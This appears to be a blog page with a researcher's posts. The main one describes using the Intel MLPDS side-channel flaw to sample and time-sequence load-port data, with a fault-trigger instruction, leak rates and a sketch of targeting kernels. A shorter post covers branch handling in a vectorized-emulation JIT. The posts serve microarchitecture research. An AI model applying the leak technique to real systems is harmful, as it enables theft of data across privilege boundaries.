Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!


Foreward

First of all, I’d like to say that I’m super excited to write up this blog. This is an idea I’ve had for over a year and I only recently got to working on. The initial implementation and proof-of-concept of this idea was actually implemented live on my Twitch! This proof-of-concept went from nothing at all to a fully-working-as-predicted implementation in just about 3 hours! Not only did the implementation go much smoother than expected, the results are by far higher resolution and signal-to-noise than I expected!

This blog is fairly technical, and thus I highly recommend that you read my previous blog on Sushi Roll, my CPU research kernel where this technique was implemented. In the Sushi Roll blog I go a little bit more into the high-level details of Intel micro-architecture and it’s a great introduction to the topic if you’re not familiar.

YouTube video for PoC
implementation

Recording of the stream where we implemented this idea as a proof-of-concept. Click for the YouTube video!


Summary

We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically multi-architectural load port data sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means in theory, all contents of loads ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.

We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.

Why

As you may be familiar, x86 is quite a complex architecture with many nooks and crannies. As time has passed it has only gotten more complex, leading to fewer known behaviors of the inner workings. There are many instructions with complex microcode invocations which access memory as were seen through my work on Sushi Roll. This led to me being curious as to what is actually going on with load ports during some of these operations.

Intel CPU traffic during a normal
write

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during a traditional memory write

Intel CPU traffic during a write requiring dirty/accessed
updates

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during the same memory write as above, but this time where the page table entries need an accessed/dirty bit update

Beyond just directly invoked microcode due to instructions being executed, microcode also gets executed on the processor during “microcode assists”. These operations, while often undocumented, are referenced a few times throughout Intel manuals. Specifically in the Intel Optimization Manual there are references to microcode assists during accessed and dirty bit updates. Further, there is a restriction on TSX sections such that they may abort when accessed and dirty bits need to be updated. These microcode assists are fascinating to me, as while I have no evidence for it, I suspect they may be subject to different levels of permissions and validations compared to traditional operations. Whenever I see code executing on a processor as a side-effect to user operations, all I think is: “here be dragons”.


A playground for CPU bugs

When I start auditing a target, the first thing that I try to do is get introspection into what is going on. If the target is an obscure device then I’ll likely try to find some bug that allows me to image the entire device, and load it up in an emulator. If it’s some source code I have that is partial, then I’ll try to get some sort of mocking of the external calls it’s making and implement them as I come by them. Once I have the target running on my terms, and not the terms of some locked down device or environment, then I’ll start trying to learn as much about it as possible…

This is no different from what I did when I got into CPU research. Starting with when Meltdown and Spectre came out I started to be the go-to person for writing PoCs for CPU bugs. I developed a few custom OSes early on that were just designed to give a pass/fail indicator if a CPU bug were able to be exploited in a given environment. This was critical in helping test the mitigations that went in place for each CPU bug as they were reported, as testing if these mitigations worked is a surprisingly hard problem.

This led to me having some cleanly made OS-level CPU exploits written up. The custom OS proved to be a great way to test the mitigations, especially as the signal was much higher compared to a traditional OS. In fact, the signal was almost just a bit too strong…

When in a custom operating system it’s a lot easier to play around with weird behaviors of the CPU, without worrying about it affecting the system’s stability. I can easily turn off interrupts, overwrite exception handlers with specialized ones, change MSRs to weird CPU states, and so on. This led to me ending up with almost a playground for CPU vulnerability testing with some pretty standard primitives.

As the number of primitives I had grew, I was able to PoC out a new CPU bug in typically under a day. But then I had to wonder… what would happen if I tried to get the most information out of the processor as possible.


Sushi Roll

And that was the starting of Sushi Roll, my CPU research kernel. I have a whole blog about the Sushi Roll research kernel, and I strongly recommend you read it! Effectively Sushi Roll is a custom kernel with message passing between cores rather than memory sharing. This means that each core has a complete copy of the kernel with no shared accesses. For attacks which need to observe the faintest signal in memory behaviors, this lead to a great amount of isolation.

When looking for a behavior you already understand on a processor, it’s pretty easy to get a signal. But, when doing initial CPU research into the unknowns and undefined behavior, getting this signal out takes every advantage as you can get. Thus in this low-noise CPU research environment, even the faintest leak would cause a pretty large disruption in determinism, which would likely show up as a measurable result earlier than traditional blind CPU research would allow.

Performance Counter Monitoring

In Sushi Roll I implemented a creative technique for monitoring the values in performance counters along with time-stamping them in cycles. Some of the performance counters in Intel processors count things like the number of micro-ops dispatched to each of the execution units on the core. Some of these counters increase during speculation, and with this data and time-stamping I was able to get some of the first-ever insights into what processor behavior was actually occurring during speculation!

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Being able to collect this sort of data immediately made unexpected CPU behaviors easier to catalog, measure, and eventually make determinstic. The more understanding we can get of the internals of the CPU, the better!


The Ultimate Goal

The ultimate goal of my CPU research is to understand so thoroughly how the Intel micro-architecture works that I can predict it with emulation models. This means that I would like to run code through an emulated environment and it would tell me exactly how many internal CPU resources would be used, which lines from caches and buffers would be evicted and what contents they would hold. There’s something beautiful to me to understanding something so well that you can predict how it will behave. And so the journey begins…

Past Progress

So far with the work in Sushi Roll we’ve been able to observe how the CPU dispatches uops during specific portions of code. This allows us to see which CPU resources are used to fulfill certain requests, and thus can provide us with a rough outline of what is happening. With simple CPU operations this is often all we need, as there are only so many ways to perform a certain operation, the complete picture can usually be drawn just from guessing “how they might have done it”. However, when more complex operations are involved, all of that goes out the window.

When reading through Intel manuals I saw many references to microcode assists. These are “situations” in your processor which may require microcode to be dispatched to execution units to perform some complex-ish logic. These are typically edge cases which don’t occur frequently enough for the processor to worry about handling them in hardware, rather just needing to detect them and cause some assist code to run. We know of one microcode assist which is relatively easy to trigger, updating the accessed and dirty bits in the page tables.

Accessed and dirty bits

In the Intel page table (and honestly most other architectures) there’s a concept of accessed and dirty bits. These bits indicate whether or not a page has ever been translated (accessed), or if it has been written to (dirtied). On Intel it’s a little strange as there is only a dirty bit on the final page table entry. However, the accessed bits are present on each level of the page table during the walk. I’m quite familiar with these bits from my work with hypervisor-based fuzzing as it allows high performance differential resetting of VMs by simply walking the page tables and restoring pages that were dirtied to their original state of a snapshot.

But this leads to an curiosity… what is the mechanic responsible for setting these bits? Does the internal page table silicon set these during a page table walk? Are they set after the fact? Are they atomically set? Are they set during speculation or faulting loads?

From Intel manuals and some restrictions with TSX it’s pretty obvious that accessed and dirty bits are a bit of an anomaly. TSX regions will abort when memory is touched that does not have the respective accessed or dirty bits set. Which is strange, why would this be a limitation of the processor?

TSX aborts during accessed and dirty bit
updates

Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32 architectures optimization reference manual

… weird huh? Testing it out yields exactly what the manual says. If I write up some sample code which accesses memory which doesn’t have the respective accessed or dirty bits set, it aborts every time!

What’s next?

So now we have an ability to view what operation types are being performed on the processor. However this doesn’t tell us a huge amount of information. What we would really benefit from would be knowing the data contents that are being operated on. We can pretty easily log the data we are fetching in our own code, but that won’t give us access to the internal loads that happen as side effects on the processor, nor would it tell us about the contents of loads which happen during speculation.

Surely there’s no way to view all loads which happen on the processor right? Almost anything during speculation is a pain to observe, and even if we could observe the data it’d be quite noisy.

Or maybe there is a way…

… a way?

Fortunately there may indeed be a way! A while back I found a CPU vulnerability which allowed for random values to be sampled off of the load ports. While this vulnerability is initially thought to only allow for random values to be sampled from the load ports, perhaps we can get a bit more creative about leaking…


Multi-Architectural Load Port Data Sampling (MLPDS)

Multi-architectural load port data sampling sounds like an overly complex name, but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel processors which allow a user to potentially get access to stale data recently transferred through load ports. This was actually a bug that I reported to Intel a while back and they ended up finding a few similar issues with different instruction combinations, this is ultimately what comprises MLPDS.

MLPDS Intel Description

Description of MLPDS from Intel’s MDS DeepDive

The specific bug that I found was initially called “cache line split” or “cache line split load” and it’s exactly what you might expect. When a data access straddles a cache line (multi-byte load containing some bytes on one cache line and the remaining bytes on another). Cache lines are 64-bytes in size so any multi-byte memory access to an address with the bottom 6 bits set would cause this behavior. These accesses must also cause a fault or an assist, but by using TSX it’s pretty easy to get whatever behavior you would like.

This bug is largely an issue when hyper-threading is enabled as this allows a sibling thread to be executing protected/privileged code while another thread uses this attack to observe recently loaded data.

I found this bug when working on early PoCs of L1TF when we were assessing the impact it had. In my L1TF PoC (which was using random virtual addresses each attempt) I ended up disabling the page table modification. This ultimately is the root requirement for L1TF to work, and to my surprise, I was still seeing a signal. I initially thought it was some sort of CPU bug leaking registers as the value I was leaking was never actually read in my code. It turns out what I ended up observing was the hypervisor itself context switching my VM. What I was leaking was the contents of the registers as they were loaded during the context switch!

Unfortunately MLPDS has a really complex PoC…

mov rax, [-1]

After this instruction executes and it faults or aborts, the contents of rax during a small speculative window will potentially contain stale data from load ports. That’s all it takes!

From this point it’s just some trickery to get the 64-bit value leaked during the speculative window!


It’s all too random

Okay, so MLPDS allows us to sample a “random” value which was recently loaded on the load ports. This is a great start as we could probably run this attack over and over and see what data is observed on a sample piece of code. Using hyper-threading for this attack will be ideal because we can have one thread running some sample code in an infinite loop, while the other code observes the values seen on the load port.

An MLPDS exploit

Since there isn’t yet a public exploit for MLPDS, especially with the data rates we’re going to use here, I’m just going to go over the high-level details and not show how it’s implemented under the hood.

For this MLPDS exploit I use a couple different primitives. One is a pretty basic exploit which simply attempts to leak the raw contents of the value which was leaked. This value that we leak is always 64-bits, but we can chose to only leak a few of the bytes from it (or even bit-level granularity). There’s a performance increase for the fewer bytes that we leak as it decreases the number of cache lines we need to prime-and-probe each attempt.

There’s also another exploit type that I use that allows me to look for a specific value in memory, which turns the leak from a multi-byte leak to just a boolean “was value/wasn’t value”. This is the highest performance version due to how little information has to be leaked past the speculative window.

All of these leaks will leak a specific value from a single speculative run. For example if we were to leak a 64-bit value, the 64-bit value will be from one MLPDS exploit and one speculative window. Getting an entire 64-bit value out during a single speculative window is a surprisingly hard problem, and I’m going to keep that as my own special sauce for a while. Compared to many public CPU leak exploits, this attack does not loop multiple times using masks to slowly reveal a value, it will get revealed from a single attempt. This is critical to us as otherwise we wouldn’t be able to observe values which are loaded once.

Here’s some of the leak rate numbers for the current version of MLPDS that I’m using:

Leak type Leaks/second
Known 64-bit value 5,979,278
8-bit any value 228,479
16-bit any value 116,023
24-bit any value 25,175
32-bit any value 13,726
40-bit any value 12,713
48-bit any value 10,297
56-bit any value 9,521
64-bit any value 8,234

It’s important to note that the known 64-bit value search is much faster than all of the others. We’ll make some good use of this later!

Test

Let’s try out a simple MLPDS attack on a small piece of code which loops forever fetching 2 values from memory.

mov  rax, 0x12345678f00dfeed
mov [0x1000], rax

mov  rax, 0x1337133713371337
mov [0x1008], rax

2:
    mov rax, [0x1000]
    mov rax, [0x1008]
    jmp 2b

This code should in theory just causes two loads. One of a value 0x12345678f00dfeed and another of a value 0x1337133713371337. Lets spin this up on a hardware thread and have the sibling thread perform MLPDS in a loop! We’ll use our 64-bit any value MLPDS attack and just histogram all of the different values we observe get leaked.

Sampling done:
    0x12345678f00dfeed : 100532
    0x1337133713371337 : 99217

Viola! Here we see the two different secret values on the attacking thread, at a pretty much comparable frequency.

Cool… so now we have a technique that will allow us to see the contents of all loads on load ports, but randomly sampled only. Let’s take a look at the weird behaviors during accessed bit updates by clearing the accessed bit on the final level page tables every loop in the same code above.

Sampling done:
    0x0000000000000008 : 559
    0x0000000000000009 : 2316
    0x000000000000000a : 142
    0x000000000000000e : 251
    0x0000000000000010 : 825
    0x0000000000000100 : 19
    0x0000000000000200 : 3
    0x0000000000010006 : 438
    0x000000002cc8c000 : 3796
    0x000000002cc8c027 : 225
    0x000000002cc8d000 : 112
    0x000000002cc8d027 : 57
    0x000000002cc8e000 : 1
    0x000000002cc8e027 : 35
    0x00000000ffff8bc2 : 302
    0x00002da0ea6a5b78 : 1456
    0x00002da0ea6a5ba0 : 2034
    0x0000700dfeed0000 : 246
    0x0000700dfeed0008 : 5081
    0x0000930000000000 : 4097
    0x00209b0000000000 : 15101
    0x1337133713371337 : 2028
    0xfc91ee000008b7a6 : 677
    0xffff8bc2fc91b7c4 : 2658
    0xffff8bc2fc9209ed : 4565
    0xffff8bc2fc934019 : 2

Whoa! That’s a lot more values than we saw before. They weren’t from just the two values we’re loading in a loop, to many other values. Strangely the 0x1234... value is missing as well. Interesting. Well since we know these are accessed bit updates, perhaps some of these are entries from the page table walk. Let’s look at the addresses of the page table entry we’re hitting.

CR3   0x630000
PML4E 0x2cc8e007
PDPE  0x2cc8d007
PDE   0x2cc8c007
PTE   0x13370003

Oh! How cool is that!? In the loads we’re leaking we see the raw page table entries with various versions of the accessed and dirty bits set! Here are the loads which stand out to me:

Leaked values:

    0x000000002cc8c000 : 3796                                                   
    0x000000002cc8c027 : 225                                                    
    0x000000002cc8d000 : 112                                                    
    0x000000002cc8d027 : 57                                                     
    0x000000002cc8e000 : 1                                                      
    0x000000002cc8e027 : 35 

Actual page table entries for the page we're accessing:

CR3   0x630000                                                                  
PML4E 0x2cc8e007                                                                
PDPE  0x2cc8d007                                                                
PDE   0x2cc8c007                                                                
PTE   0x13370003

The entries are being observed as 0x...27 as the 0x20 bit is the accessed bit for page table entries.

Other notable entries are 0x0000930000000000 and 0x00209b0000000000 which look like the GDT entries for the code and data segments. 0x0000700dfeed0000 and 0x0000700dfeed0008 which are the 2 virtual addresses I’m accessing the un-accessed memory from. Who knows about the rest of the values? Probably some stack addresses in there…

So clearly as we expected, the processor is dispatching uops which are performing a page table walk. Sadly we have no idea what the order of this walk is, maybe we can find a creative technique for sequencing these loads…


Sequencing the Loads

Sequencing the loads that we are leaking with MLPDS is going to be critical to getting meaningful information. Without knowing the ordering of the loads we simply know contents of loads. Which is a pretty awesome amount of information, I’m definitely not complaining… but come on, it’s not perfect!

But perhaps we can limit the timing of our attack to a specific window, and infer ordering based on that. If we can find some trigger point where we can synchronize time between the attacker thread and the thread with secrets, we could change the delay between this synchronization and the leak attempt. By scanning this leak we should hopefully get to see a cycle-by-cycle view of observed values.

A trigger point

We can perform an MLPDS attack on a delay, however we need a reference point to delay from. I’ll steal the oscilloscope terminology of a trigger, or a reference location to synchronize with. Similar to an oscilloscope this trigger will synchronize our on the time domain each time we attempt.

The easiest trigger we can use works only in an environment where we control both the leaking and secret threads, but in our case we have that control.

What we can do is simply have semaphores at each stage of the leak. We’ll have 2 hardware threads running with the following logic:

  1. (Thread A running) (Thread B paused)
  2. (Thread A) Prepare to do a CPU attack, request thread B execute code
  3. (Thread A) Delay for a fixed amount of cycles with a spin loop
  4. (Thread B) Execute sample code
  5. (Thread A) At some “random” point during Thread B executing sample code, perform MLPDS attack to leak a value
  6. (Thread B) Complete sample code execution, wait for thread A to request another execution
  7. (Thread A) Log the observed value and the number of cycles in the delay loop
  8. goto 0 and do this many times until significant data is collected

Uncontrolled target code

If needed a trigger could be set on a “known value” at some point during execution if target code is not controllable. For example, if you’re attacking a kernel, you could identify a magic value or known user pointer which gets accessed close to the code under test. An MLPDS attack can be performed until this magic value is seen, then a delay can start, and another attack can be used to leak a value. This allows an uncontrolled target code to be sampled in a similar way. If the trigger “misses” it’s fine, just try again in another loop.

Did it work?

So we put all of these things together, but does it actually work? Lets try our 2 load example, and we’ll make sure they depend on each other to ensure they don’t get re-ordered by the processor.

Prep code:

core::ptr::write_volatile(vaddr as *mut u64, 0x12341337cafefeed);              
core::ptr::write_volatile((vaddr as *mut u64).offset(1), 0x1337133713371337);  

Test code:

let ptr = core::ptr::read_volatile(vaddr as *mut usize);
core::ptr::read_volatile((vaddr as usize + (ptr & 0x8)) as *mut usize);

In this code we set up 2 dependant loads. One which reads a value, and then another which masks the value to get the 8th bit, which is used as an offset to a subsequent access. Since the values are constants, we know that the second access will always access at offset 8, thus we expect to see a load of 0x1234... followed by 0x1337....

Graphing the data

To graph the data we have collected, we want to collect the frequencies each value was seen for every cycle offset. We’ll plot these with an x axis in cycles, and a y axis in frequency the value was observed at that cycle count. Then we’ll overlay multiple graphs for the different values we’ve seen. Let’s check it out in our simple case test code!

Sequenced leak example data Sequenced leak example data

Here we also introduce a normal distribution best-fit for each value type, and a vertical line through the mean frequency-weighted value.

And look at that! We see the first access (in light blue) indicating that the value 0x12341337cafefeed was read, and slightly after we see (in orange) the value 0x1337133713371337 was read! Exactly what we would have expected. How cool is that!? There’s some other noise on here from the testing harness, but they’re pretty easy to ignore in this case.


A real-data case

Let’s put it all together and take a look at what a load looks like on pages which have not yet been marked as accessed.

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only look at the page table entry values and the value contained on the page we’re accessing.

Here are the page table entries for the memory we’re accessing in our example:

CR3   0x630000
PML4E 0x2cc7c007
PDPE  0x2cc7b007
PDE   0x2cc7a007
PTE   0x13370003
Data  0x12341337cafefeed

We’re going to reset all page table entries to their non-dirty, non-accessed states, invalidate the TLB for the page via invlpg, and then read from the memory once. This will cause all accessed bits to be updated in the page tables! Here’s what we get…

Annotated ucode page walk Annotated ucode-assist page walk as observed with this technique

Here it’s hard to say why we see the 3rd and 4th levels of the page table get hit, as well as the page contents, prior to the accessed bit updates. Perhaps the processor tries the access first, and when it realizes the accessed bits are not set it goes through and sets them all. We can see fairly clearly that after this page data is read ~300 cycles in, that it performs a page-by-page walk through each level. Presumably this is where the processor is reading the original values from pages, oring in the accessed bit, and moving to the next level!


Speeding it up

So far using our 64-bit MLPDS leak we can get about 8,000 leaks per second. This is a decent data rate, but when we’re wanting to sample data and draw statistical significance, more is always better. For each different value we want to log, and for each cycle count, we likely want about ~100 points of data. So lets assume we want to sample 10 values over a 1000 cycle range, and we’ll likely want 1 million data points. This means we’ll need about 2 minutes worth of runtime to collect this data.

Luckily, there’s a relatively simple technique we can use to speed up the data rates. Instead of using the full arbitrary 64-bit leak for the whole test, we can use the arbitrary leak early on to determine the values of interest. We just want to use the arbitrary leak for long enough to determine the values which we know are accessed during our test case.

Once we know the values we actually want to leak, we can switch to using our known-value leak which allows for about 6 million leaks per second. Since this can only look for one value at a time, we’ll also have to cycle through the values in our “known value” list, but the speedup is still worth it until the known value list gets incredibly large.

With this technique, collecting the 1 million data points for something with 5-6 values to sample only takes about a second. A speedup of two orders of magnitude! This is the technique that I’m currently using, although I have a fallback to arbitrary value mode if needed for some future use.


Conclusion

We introduced an interesting technique for monitoring Intel load port traffic cycle-by-cycle and demonstrated that it can be used to get meaningful data to learn how Intel micro-architecture works. While there is much more for us to poke around in, this was a simple example to show this technique!

Future

There is so much more I want to do with this work. First of all, this will just be polished in my toolbox and used for future CPU research. It’ll just be a good go-to tool for when I need a little bit more introspection. But, I’m sure as time goes on I’ll come up with new interesting things to monitor. Getting logging of store-port activity would be useful such that we could see the other side of memory transactions.

As with anything I do, performance is always an opportunity for improvement. Getting a higher-fidelity MLPDS exploit, potentially with higher throughput, would always help make collecting data easier. I’ve also got some fun ideas for filtering this data to remove “deterministic noise”. Since we’re attacking from a sibling hyperthread I suspect we’d see some deterministic sliding and interleaving of core usage. If I could isolate these down and remove the noise that’d help a lot.

I hope you enjoyed this blog! See you next time!


Miniblog: How conditional branches work in Vectorized Emulation

7 October 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Let me know if you like this mini-blog format! It takes a lot less time than a whole blog, but I think will still have interesting content!


Prereqs

You should probably read the Introduction to Vectorized Emulation blog!

Or perhaps watch the talk I gave at RECON 2019

Summary

I spent this weekend working on a JIT for my IL (FalkIL, or fail). I thought this would be a cool opportunity to make a mini-blog describing how I currently handle conditional branches in vectorized emulation.

This is one of the most complex parts of vectorized emulation, and has a lot of depth. But today we’re going to go into a simple merging example. What I call the “auto-merge”. I call it an auto-merge because it doesn’t require any static analysis of potential merging points. The instructions that get emit simply allow for auto re-merging of divergent VMs. It’s really simple, but pretty nifty. We have to perform this logic on every branch.


FalkIL Example

Here’s an example of what FalkIL looks like:

FalkIL example


JIT

Here’s what the JIT for the above IL example looks like:

FalkIL JIT example

Ooof… that exploded a bit. Let’s dive in!


JIT Calling Convention

Before we can go into what the JIT is doing, we have to understand the calling convention we use. It’s important to note that this calling convention is custom, and follows no standard convention.

Kmask Registers

Kmask registers are the bitmasks provided to us in hardware to mask off certain operations. Since we’re always executing instructions even if some VMs have been disabled, we must always honor using kmasks.

Intel provides us with 8 kmask registers. k0 through k7. k0 is hardcoded in hardware to all ones (no masking). Thus, we’re not able to use this for general purpose masking.

Online VM mask

Since at any given time we might be performing operations with VMs disabled, we need to have one kmask register always dedicated to holding the mask of VMs that are actively running. Since k1 is the first general purpose kmask we can use, that’s exactly what we pick. Any bit which is clear in k1 (VM is disabled), must not have its state modified. Thus you’ll see k1 is used as a merging mask for almost every single vectorized operation we do.

By using the k1 mask in every instruction, we preseve the lanes of vector registers which are disabled. This provides near-zero-cost preservation of disabled VM states, such that we don’t have to save/restore massive ZMM registers during divergence.

This mask must also be honored during scalar code that emulates complex vectorized operations (for example divs, which have no vectorized instruction).

“Following” VM mask

At some points during emulation we run into situations where VMs have to get disabled. For example, some VMs might take a true branch, and others might take the false (or “else”) side of a branch. In this case we need to make a decision (very quickly) about which VM to follow. To do this, we have a VM which we mark as the “following” VM. We store this “following” VM mask in k7. This always contains a single bit, and it’s the bit of the VM which we will always follow when we have to make divergence decisions.

The VM we are “following” must always be active, and thus (k7 & k1) != 0 must always be true! This k7 mask only has to be updated when we enter the JIT, thus the computation of which VM to “follow” may be complex as it will not be a common expense. While the JIT is executing, this k7 mask will never have to be updated unless the VM we are following causes a fault (at which point a new VM to follow will be computed).

Kmask Register Summary

Here’s the complete state of kmask register allocation during JIT

K0    - Hardcoded in hardware to all ones
K1    - Bitmask indicating "active/online" VMs
K2-K6 - Scratch kmask registers
K7    - "Following" VM mask

ZMM registers

The 512-bit ZMM registers are where we store most of our active contextual data. There are only 2 special case ZMM registers which we reserve.

“Following” VM index vector

Following in the same suit of the “Following VM mask”, mentioned above, we also store the index for the “following” VM in all 8 64-bit lanes of zmm30. This is needed to make decisions about which VM to follow. At certain points we will need to see which VM’s “agree with” the VM we are following, and thus we need a way to quickly broadcast out the following VMs values to all components of a vector.

By holding the index (effectively the bit index of the following VM mask) in all lanes of the zmm30 vector, we can perform a single vpermq instruction to broadcast the following VM’s value to all lanes in a vector.

Similar to the VM mask, this only needs to be computed when the JIT is entered and when faults occur. This means this can be a more expensive operation to fill this register up, as it stays the same for the entirity of a JIT execution (until a JIT/VM exit).

Why this is important

Lets say:

zmm31 contains [10, 11, 12, 13, 14, 15, 16, 17]

zmm30 contains [3, 3, 3, 3, 3, 3, 3, 3]

The CPU then executes vpermq zmm0, zmm30, zmm31

zmm0 now contains [13, 13, 13, 13, 13, 13, 13, 13]… the 3rd VM’s value in zmm31 broadcast to all lanes of zmm0

Effectively vpermq uses the indicies in its second operand to select values from the third operand.

“Desired target” vector

We allocate one other ZMM register (zmm31) to hold the block identifiers for where each lane “wants” to execute. What this means is that when divergence occurs, zmm31 will have the corresponding lane updated to where the VM that diverged “wanted” to go. VMs which were disabled thus can be analyzed to see where they “wanted” to go, but instead they got disabled :(

ZMM Register Summary

Here’s the complete state of ZMM register allocation during JIT

Zmm0-Zmm3  - Scratch registers for internal JIT use
Zmm4-Zmm29 - Used for IL register allocation
Zmm30      - Index of the VM we are following broadcast to all 8 quadwords
Zmm31      - Branch targets for each VM, indicates where all VMs want to execute

General purpose registers

These are fairly simple. It’s a lot more complex when we talk about memory accesses and such, but we already talked about that in the MMU blog!

When ignoring the MMU, there are only 2 GPRs that we have a special use for…

Constant storage database

On the Knights Landing Xeon Phi (the CPU I develop vectorized emulation for), there is a huge bottleneck on the front-end and instruction decode. This means that loading a constant into a vector register by loading it into a GPR mov, then moving it into the lowest-order lane of a vector vmovq, and then broadcasting it vpbroadcastq, is actually a lot more expensive than just loading that value from memory.

To enable this, we need a database which just holds constants. During the JIT, constants are allocated from this table (just appending to a list, while deduping shared constants). This table is then pointed to by r11 during JIT. During the JIT we can load a constant into all active lanes of a VM by doing a single vpbroadcastq zmm, kmask, qword [r11+OFFSET] instruction.

While this might not be ideal for normal Xeon processors, this is actually something that I have benchmarked, and on the Xeon Phi, it’s much faster to use the constant storage database.

Target registers

At the end of the day we’re emulating some other architecture. We hold all target architecture registers in memory pointed to by r12. It’s that simple. Most of the time we hold these in IL registers and thus aren’t incurring the cost of accessing memory.

GPR summary

r11 - Points to constant storage database (big vector of quadword constants)
r12 - Points to target architecture registers

Phew

Okay, now we know what register states look like when executing in JIT!


Conditional branches

Now we can get to the meat of this mini-blog! How conditional branches work using auto-merging! We’re going to go through instruction-by-instruction from the JIT graph we showed above.

Here’s the specific code in question for a conditional branch:

Conditional Branch

Well that looks awfully complex… but it’s really not. It’s quite magical!

The comparison

comparison

First, the comparision is performed on all lanes. Remember, ZMM registers hold 8 separate 64-bit values. We perform a 64-bit unsigned comparison on all 8 components, and store the results into k2. This means that k2 will hold a bitmask with the “true” results set to 1, and the “false” results set to 0. We also use a kmask k1 here, which means we only perform the comparison on VMs which are currently active. As a result of this instruction, k2 has the corresponding bits set to 1 for VMs which were actively executing at the time, and also resulted in a “true” value from their comparisons.

In this case the 0x1 immediate to the vpcmpuq instruction indicates that this is a “less than” comparison.

vpcmpq/vpcmpuq immediate

Note that the immediate value provided to vpcmpq and the unsigned variant vpcmpuq determines the type of the comparison:

cmpimm

The comparison inversion

comparison inversion

Next, we invert the comparison operation to get the bits set for active VMs which want to go to the “false” path. This instruction is pretty neat.

kandnw performs a bitwise negation of the second operand, and then ands with the third operand. This then is stored into the first operand. Since we have k2 as the second operand (the result of the comparison) this gets negated. This then gets anded with k1 (the third operand) to mask off VMs which are not actively executing. The result is that k3 now contains the inverted result from the comparison, but we keep “offline” VMs still masked off.

In C/C++ this is simply: k3 = (~k2) & k1

The branch target vector

branch targets

Now we start constructing zmm0… this is going to hold the “labels” for the targets each active lane wants to go to. Think of these “labels” as just a unique identifier for the target block they are branching to. In this case we use the constant storage database (pointed to by r11) to load up the target labels. We first load the “true target” labels into zmm0 by using the k2 kmask, the “true” kmask. After this, we merge the “false target” labels into zmm0 using k3, the “false/inverted” kmask.

After these 2 instructions execute, zmm0 now holds the target “labels” based on their corresponding comparison results. zmm0 now tells us where the currently executing VMs “want to” branch to.

The merge into master

merge into master

Now we merge the target branches for the active VMs which were just computed (zmm0), into the master target register (zmm31). Since VMs can be disabled via divergence, zmm31 holds the “master” copy of where all VMs want to go (including ones which have been masked off and are “waiting” to execute a certain target).

zmm31 now holds the target labels for every single lane with the updated results of this comparison!

Broadcasting the target

broadcasting the target

Now that we have zmm31 containing all of the branch targets, we now have to pick the one we are going to follow. To do this, we want a vector which contains the broadcasted target label of the VM we are following. As mentioned in the JIT calling convention section, zmm30 contains the index of the VM we are following in all 8 lanes.

Example

Lets say for example we are following VM #4 (zero-indexed).

zmm30 contains [4, 4, 4, 4, 4, 4, 4, 4]

zmm31 contains [block_0, block_0, block_1, block_1, block_2, block_2, block_2, block_2]

After the vpermq instruction we now have zmm1 containing [block_2, block_2, block_2, block_2, block_2, block_2, block_2, block_2].

Effectively, zmm1 will contain the block label for the target that the VM we are following is going to go to. This is ultimately the block we will be jumping to!

Auto-merging

auto-merging

This is where the magic happens. zmm31 contains where all the VMs “want to execute”, and zmm1 from the above instruction contains where we are actually going to execute. Thus, we compute a new k1 (active VM kmask) based on equality between zmm31 and zmm1.

Or in more simple terms… if a VM that was previously disabled was waiting to execute the block we’re about to go execute… bring it back online!

Doin’ the branch

branching

Now we’re at the end. k2 still holds the true targets. We and this with k7 (the “following” VM mask) to figure out if the VM we are following is going to take the branch or not.

We then need to make this result “actionable” by getting it into the eflags x86 register such that we can conditionally branch. This is done with a simple kortestw instruction of k2 with itself. This will cause the zero flag to get set in eflags if k2 is equal to zero.

Once this is done, we can do a jnz instruction (same as jne), causing us to jump to the true target path if the k2 value is non-zero (if the VM we’re following is taking the true path). Otherwise we fall through to the “false” path (or potentially branch to it if it’s not directly following this block).


Update

After a little nap, I realized that I could save 2 instructions during the conditional branch. I knew something was a little off as I’ve written similar code before and I never needed an inverse mask.

updated JIT

Here we’ll note that we removed 2 instructions. We no longer compute the inverse mask. Instead, we initially store the false target block labels into zmm31 using the online mask (k1). This temporarly marks that “all online VMs want to take the false target”. Then, using the k2 mask (true targets), merge over zmm31 with the true target block labels.

Simple! We remove the inverse mask computation kandnw, and the use of the zmm0 temporary and merge directly into zmm31. But the effect is exactly the same as the previous version.

Not quite sure why I thought the inverse mask was needed, but it goes to show that a little bit of rest goes a long way!

Due to instruction decode pressure on the Xeon Phi (2 instructions decoded per cycle), this change is a minimum 1 cycle improvement. Further, it’s a reduction of 8 bytes of code per conditional branch, which reduces L1i pressure. This is likely in the single digit percentages for overall JIT speedup, as conditional branches are everywhere!


Fin

And that’s it! That’s currently how I handle auto-merging during conditional branches in vectorized emulation as of today! This code is often changed and this is probably not its final form. There might be a simpler way to achieve this (fewer instructions, or lower latency instructions)… but progress always happens over time :)

It’s important to note that this auto-merging isn’t perfect, and most cases will result in VMs hanging, but this is an extremely low cost way to bring VMs online dynamically in even the tightest loops. More macro-scale merging can be done with smarter static-analysis and control flow decisions.

I hope this was a fun read! Let me know if you want more of these mini-blogs.


Sushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection

19 August 2019 at 07:11

Twitter

